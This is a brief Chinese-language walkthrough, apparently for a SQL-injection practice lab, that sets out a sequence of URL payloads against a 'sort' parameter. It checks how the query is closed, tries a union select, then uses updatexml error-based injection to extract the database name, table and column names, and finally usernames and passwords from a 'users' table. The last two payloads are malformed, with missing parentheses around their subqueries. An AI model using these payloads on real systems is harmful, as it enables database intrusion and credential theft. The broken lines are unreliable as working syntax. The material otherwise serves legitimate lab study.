判断闭合方式
?sort=1' #判断是否是单引号闭合
页面回显错误
?sort=1 #判断是否是整形闭合
页面回显出数据,说明是整形闭合
判断有无显示位
?sort=1' union select 1,2,3 --+
出现这种情况说明后台的查询语句并不支持联合注入,可以采用其他的注入方式,
updatexml报错
?sort=1 and updatexml(1,concat('!',database(),'!'),1) --+
进而爆破出数据库名
爆破表名
?sort=1 and updatexml(1,concat('!',(select group_concat(table_name) from information_schema.tables where table_schema='security'),'!'),1) --+
爆破列名
?sort=1 and updatexml(1,concat('!',select group_concat(column_name) from information_schema.columns where table_name='users'),'!'),1) --+
爆破用户名密码
?sort=1 and updatexml(1,concat('!',select group_concat(id,username,password) from users,'!'),1)